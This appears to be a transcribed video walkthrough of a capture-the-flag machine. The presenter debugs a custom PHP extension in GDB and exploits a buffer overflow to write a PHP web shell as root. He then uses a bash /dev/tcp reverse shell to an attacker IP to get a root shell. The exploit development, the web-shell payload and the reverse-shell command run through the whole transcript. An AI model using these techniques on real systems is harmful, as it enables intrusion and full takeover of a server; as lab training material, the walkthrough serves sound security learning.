Press enter, we added the repo. Then all we have to do is apt update, which I think it's doing for me. It is. So we'll do sudo apt install PHP 8.2. I'm also going to want to install GDB on this box. Yes. And I will probably pause the video or resume once PHP has been installed. Okay, PHP has been installed. I'm just going to switch to root so we can install this module. It goes in user lib PHP, then this directory, nclvnp. Let me get the IP address again. 9001. It's called what? lverifier.so. We have to direct it. I'm going to copy cat lverifier2 dev tcp 9001. I could scp it, but this is just an easy way. Okay. So now I want to enable it. So I'm going to, I think it has to be executable. I'm not positive, but we can go to etsy php 8.2 mods enabled, vlverifier.so. And then we want to add extension equals lverifier.so. And then we want to go into the config. I'm going to go in the CLI because that's how we're going to call PHP. And we want to add enable DL. It's going to let us load that dynamic library. And we're going to turn that on. Okay. And the last thing I'm going to do is install Gef or Jeff out of GitHub. Let's see how to install this. I'm going to have to do it as root. Let's see. Okay. So it is important you are root because the purpose of this library is it actually goes into, after all this, if we look at load user, see if we can do it quickly. It probably won't be quick to just go through all of it. What it does is it opens the shadow file and then checks if those credentials are correct. I guess we could show it. So if I just do php-a, we do ld, then what was it, lverifier. So we just loaded the library, and then we say lverifier, and then say ipsec nothing. Error reading shadow file and it crashed. If we do that with sudo, let's load this. We run it again. We get nothing. If we do a var dump on it, it's a Boolean false. If we put the password in, which is just password, we get true. So it's just doing a local validation is all this does. So we can easily send this over to GDB now. So I'm just going to do a sudo su just to make it easy. So we'll always root. We don't have to go with that. I think it also, if we did cat var log lverifier.log, it did write log entries. It's that static string. It's not that handy. But now I can do GDB PHP. And then I can just do run -a. So it's going to give the PHP the -a argument. And now we're in the interactive shell. Let's see. I was trying to think. I'm going to control B out of it. We're going to set a breakpoint on what function is this? Verify login? Is that what we want? No, that's not. Validating user input is the one we're looking at. So a break on validating. What is that? VALIDA. Is it a star? No. Validate. Oh, it's not loaded yet. Let's do run -a. Okay, we'll do DL and then verifier.s. No, it's lverifier. Okay. Now we can set a break on. There we go. Validating user input. We can run -a again. Set that. And then we can say lverifier ipsec test. And we get into the breakpoints, right? So this is how we can easily go through this. And if we wanted to, we could break at certain points. The program intended is somewhat broken, where if we went to this event recorder, we'd expect to see log path and log data here. So we can just set a breakpoint for 99C, I think that is. So we'll do B star 0x, go here, 99C. I did 2 0x's. Continue. And we're just passing nulls. I would expect it to pass the actual log line lengths, but if we set it to over 800 and it goes into this function, then that will work. So I'm just going to do that so we can see the intended way this works. So hopefully that makes sense. It sucks that if we just gave it a short thing, it did not, but it is what it is. So let's run -a, lverifier, say this, and let's do a string repeat. We'll give it a, and we would want to repeat a 801 times. Okay. And now we have to set that one breakpoint again. Continue. And we can see it's passing to event recorder and passing this data, right? This is the file it writes to, and this is the content it writes. So now let's do the string repeat, and we're going to say 65535. And then I think we can just continue here. We still have that breakpoint. We overwrote the two things. So now it's writing to all A's and writing the content all A's as well. So what we have to do is use the pattern create to find out where this is, and then we can manipulate this, right? We have a file write as root. So we could either just like write a root SSH key or write a new PHP script in that directory that has a web shell. So let's go and do that. So I'm just going to continue. We're going to say pattern. Is it just pattern in this? Oh, I'm in PHP. I guess we'll have to quit this. Control Z. Pattern 65535. We have to do create. And then I don't want that space that it grabbed. There we go. I'm going to grab all of this content. That is a lot. And we will paste it in. Okay. So we're going to do continue. It's probably going to kill PHP. Yep. So we have to run -a again, but we have to kill that breakpoint. Okay. There we go. So since we restarted, we have to reload lverifier. Then I'm going to create a variable. I'm going to call this, we'll call it data, I guess. I couldn't think of anything witty. And we'll paste that. So now when we do the say lverifier, we're just going to pass it data. Okay. And we want to go to that same breakpoint. So let's recreate it. And here is where the username begins, that the CAAAD. So let's do, first I'm going to copy these. V patterns, there's that. There's that. Okay. So we can say pattern search. We'll search that one. This is going to be 128. And then I always hate copying out of V. Let's grab this. Pattern search. And it's 16. So we want to give a username where from 16 all the way up to 128 is going to be the file path. And we can somewhat easily do that because we can just use a bunch of slashes. Like we could fill everything up with slashes and then just put the file we want, which is probably going to be over here. Let's see, var development. No, it was just /development, right? Then server management 0, and we'll call it pwn.php. So let's just create a PHP script. So what we're going to do is do a bunch of slashes, then this, then pwn.php, and then at where 128 starts, that's where we're going to put the PHP system command, right? It'll just be request cmd, I guess. So that's going to be what we want to do. So let's switch over to Python so we can easily create this string. I'm going to call the script just pwn.py, and I'm going to start out by just creating 16 A's. So I'll do A times 16, and then I want to add data. So I'll say data is equal to, we'll call this 4 B's. And then what I want to do is go up until 128 and then minus the data for this. So we'll say out is plus equal to we'll do C times, let's see, what do we want to do? We'll do 128 minus the length of out minus the length of data. Okay. And now we can say out plus equals data. And I just want to see if this worked, how I did it. So let's do Python 3, pwn.py. And that looks good, right? We should have 16 A's here. So if we copy this, echo-n, wcc 16, if we grab this, this should be 128 minus 16 minus 4, so 108. Yes. Okay, this looks good. Okay, the next thing we need is the next piece, which will be the content. So we should call data actually log name. Let's use actual correct variables. We'll say content is equal to, I really hope we don't have to like URL encode all this. So request cmd. It's a system like this. Okay. So that will be the content. And we can write this. So we can say out plus equals content. And then we want to fill this up with junk all the way to 65,535. So let's do out plus equals, we did ABC, we'll do D times 65535 minus the length of out, like that. Data is not defined. Length of log name. There we go. We have 36, but there is a line break here, so that seems fine. So let's copy this now. And I'm going to just run it and see what happens. It won't actually be able to write the file because we don't have a valid path, but it should help us find this, right? So we can just continue here. We can say data now is equal to this. And then when we run it, continue. Where's username? That is not what I expected. It looks like it did not copy everything. Data. I only copied all the Ds. I probably did my clipboard paste and not tmux. Let's see. Oh, darn it. My PHP shell has a quote, doesn't it? Let's see. pwn.py to out. Let's read it. So data is equal to file get contents out. Where is this directory? Where was I when I opened GDB? I guess we have to restart. Oh, I'm in /root probably of my Ubuntu machine. That's right. nc lvnp. Let's get my IP. There's got to be a better way to do this. But I think I had both quotes in pwn.py, didn't I? You have double quotes and single quotes. So getting rid of this is the easiest. Cat out to dev TCP 9001. Okay. We did not direct it to a file. Okay, I hope it having the line break doesn't screw anything up. I don't think it will. GDB, PHP, run-a. Let's do DL, lverifier.so. Break on validating user input. Have to run it again. Load that. So we can say that, sweet, data loaded. Say lverifier, this looks fine. Now we want to break on, let's see, 99C. I think that address is still fine. Awesome. So I think everything is good. It's hard for us to tell the path. Let's see, x/s RDI, is it going to? C repeats. I think it'll be fine. We'll see. It's not showing me the end of it, what it would be, but I think everything is good. We have the path here. That looks fine. So let us, let's see. We want to v pwn.py, and we want to make this an actual path. So we can say log name is going to be this path /pwn.php. Python 3, pwn.py. Let's do xclip, selection, primary, and clipboard. I don't know which clipboard we'll be pasting, but we'll do them both. So now we should be able to trigger this from our browser. Let's see. Localhost, let us intercept this request. Proxy, intercept on. Okay. I'm going to paste our payload. I wonder if I have to URL encode it. We'll just send it. We got invalid credentials. It put a line break there. Didn't get invalid credentials. Let's go back to the box. There is no pwn.php, so it did not work. Let's see. I just control U to URL encode it. We got invalid credentials. Did not work. Because, oh. What did I forget? We need to make these all slashes, I think. So pwn.py. We want those to be all slashes. That's a lot of D's. Paste that. Get rid of that line break. So now the path is slash. Invalid credentials. Still nothing. What is going wrong here? There's something bad. Let's see, AAA. That looks fine to me. So what I'm going to do is we're going to go back to a debug session. And we're going to test this out. So we're going to change out to be this. That is not it. There we go. Development server, that looks fine. We want to make this directory. Okay. So let's redo this. Run -a. We have to load the library, break on validating user input. Run -a again. Load it. Get the data. And run it. So a breakpoint should still be fine. Let's set it again. We'll continue. And this we're going to write the shell. So we will step into it. And then let's see. Let's look for the file open. So in event recorder. See, param, get clean size. I wonder if this or something screwing us up. I don't know what get clean size is. Here's the file open. 45B. B star 45B. Continue. Okay. We do the file open command. Let's see, x/s RDI. 63 times of a slash, and then we have this. I wonder if we have to send a null byte. Because I wonder if it's attempting to open this and then also this. So we probably have to put a null byte in there, I think. So we terminate the string. Because if we step over, I think we errored, right? There's no way we created that file. SH 192.168.58. What was that IP? I don't feel like restarting GDB again. 239. For our log, we're writing to development. Yes, I think that's what's going on. We forgot the null byte. So let's try that real quick. Let's go where pwn.py is. So we do log name. Let's see. So we wrote 16 A's. This is where we begin overwriting. We want to add a null byte here. So I guess we can do plus x00 like that. So that should terminate the log name. Python 3, pwn.py. Let's see. Do we just do like that? Let's see. Should be pwn.php. We have a null byte. Okay. Out. Let's copy this over. Sudo su. nclvmp 9001 to out. Sent it. Data is now that. Let's run this again. Continue. Let's see. I have no idea where we are. Event recorder. This is the fopen. I don't think the null byte did it. Because that's not even going to a string anymore. Yeah, that was not the issue. I think I'm on the right track, but just the wrong way. Instead of doing a, what was it? A null byte, I wonder if we just did a line break, because line breaks also will serve as separators. And if that's the case, we don't need to do all this padding, right? We could just do line break and then add junk and make our command a bit easier. But let's try this real quick. So we give pwn.py to out. Let's cat out to the file. Run netc again. Copy that. There we go. Data. Run this. And let's see. So event record, that's looking maybe better. fopen. Let's see. Did that work? ls/development server. There we go. That's it. If we cat this now, we have what we want. So we have it working. Let us Python 3 pwn.py. We'll grab this and we'll run it on the server. Let's see. I was using xclip, wasn't I? Xclip selection clipboard primary. There we go. So we send this. We would definitely need to URL encode it because we do have that line break. So I think that put it all on one line. We get invalid credentials. We have a pwn.php with, oh man, that may be hard to hit. It's there, but can we hit it? We may need to add like a \r/n or something. I don't know what we just did. It was not what we intended to do. Will it read pwn.php? We're on intercept. Not found. So that is odd. We're getting close. We have a return after. Don't know why it added that. Let's see. We do \r/n? Or, yeah, let's try that. Let's see. I'm only going to do my primary, and we'll see if that works. Was it a repeater? It was. Paste. Get rid of that line break. URL encode. Send it. Did not create a new file. I wonder if it was clipboard is what I want, maybe. Try it again. Control U. I don't think I URL encoded all I wanted. Still nothing. Let's go up here. Oh, why is it doing 2 lines? I don't think it's encoding the \r. That is annoying. So I don't know if we want that. Let's see. I'm trying to think how else we could just terminate this. I wonder if we just have to use like Python's URL lib encode. Because this does not seem to be working. Didn't decode it again, or encode it. If I send it, let's see, let's change the name to own. Yes. So if I get rid of this, we can URL encode ourselves. So let's see, 3F is a question mark. Let's see, 3F. We want what a line break is. 0A. Like that. There we go. It was just Burpsuite doing a bad job encoding. That was it. So if we now go to own.php, that is a file. cmd equals ID. We are root. So now we can just get a shell. That was an odd thing. Glad you stuck with me though through that. That confused me for a second, but that's how we debug. So we can say --c. Let's change this to a post request. --c, --i, dev tcp 10.10.14.8, 9001, 0 and 1 like that. URL encode this. Go here and see lvnp 9001, send, and we have a shell as root. We finally did it. So that is the box. Hope you guys enjoyed it. Take care, and I'll see you all next time.